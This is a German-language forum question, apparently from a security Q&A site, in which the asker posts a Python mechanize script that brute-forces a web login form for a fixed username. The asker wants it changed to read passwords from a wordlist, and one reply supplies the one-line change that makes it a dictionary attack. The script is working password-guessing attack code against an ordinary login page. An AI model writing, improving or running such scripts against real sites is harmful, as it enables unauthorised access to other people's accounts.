Also, ich habe dieses Python-Skript unten. Was es tut, ist es im Grunde Bruteforces ein Web-Formular (Login) mit iertools. Es tut, was ich will, ich muss es perfekt funktionieren usw., aber ich würde gerne fragen, ob jemand den Bruteforce/Dictionary-Generierungsprozess durch eine load-passwords-from-wordlist.txt-Funktion ersetzen könnte. Wenn jemand das tun könnte, wäre das großartig, denn ich habe keinen Weg gefunden, dies zu tun.Hilfe - Web-Form Bruteforcing mit Python
Vielen Dank im Voraus!
Mein Code:
#!/usr/bin/python
import mechanize
import itertools
br = mechanize.Browser()
br.set_handle_equiv(True)
br.set_handle_redirect(True)
br.set_handle_referer(True)
br.set_handle_robots(False)
combos = itertools.permutations("a-zA-Z",5)
r = br.open("http://example.com/login")
for x in combos:
br.select_form(nr = 0)
br.form['username'] = "my_username_123"
br.form['password'] = ''.join(x)
print "Checking ",br.form['password']
response = br.submit()
if response.geturl()!="http://example.com/login":
print "Correct password is ",''.join(x)
break
Hallo und willkommen auf Informationssicherheit! Für mich klingt das eher nach einer Frage zum Programmieren (Lesen von Dateien mit Python) als nach Sicherheit. Sie könnten bei Stack Overflow fragen, aber ich vermute, sie würden erwarten, dass Sie Ihren eigenen Versuch machen, bevor Sie fragen. – Anders
Ersetzen Sie "combos = itertools ..." durch "combos = open ('wordlist.txt')" – paj28